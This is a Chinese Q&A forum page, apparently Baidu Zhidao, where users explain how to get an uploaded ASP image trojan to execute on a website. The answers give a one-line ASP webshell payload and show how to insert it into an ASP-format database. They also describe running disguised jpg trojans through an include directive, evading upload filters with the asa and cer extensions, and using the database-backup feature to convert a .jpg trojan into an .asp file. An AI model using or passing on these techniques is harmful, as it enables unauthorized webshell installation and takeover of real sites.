asp图片木马上传后怎么执行

 我来答
匿名用户
2015-07-15
展开全部
  只要知道了asp数据库地址,那么提交一句话木马后,直接访问asp数据库就可运行木马了。
  如果后台没有类似数据库备份功能,可以生成新文件,或者直接修改文件。那么很难直接让木马运行,不过还是有一些方法,可以考虑。
  1、如果后台数据库是以asp格式存储的。那么可以采用在数据库中插入一句话木马(<%execute request("1")%>),然后利用一句话木马上传一个完整木马。
  2、如果网站后台允许修改网站联系信息等页面,而且页面也是也是以asp存储,那么可以利用asp的包含文件,巧妙的令jpg、bmp等格式木马得以运行。比如在其中插入
  <!-- #include file=/upload/****.jpg -->
  3、还可以看看网站上传类型是否有严格的过滤,如果仅仅是限制了asp文件,那么可以尝试上传asa、cer等等。
低调侃大山
2014-02-23 · 家事,国事,天下事,关注所有事。
低调侃大山
采纳数:67731 获赞数:374607

向TA提问 私信TA
展开全部
用图片上传来上传改成JPG后缀的木马,再利用备份数据库来将木马备份成*.asp文件。很经典的挂马方法 。
本回答被提问者和网友采纳
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式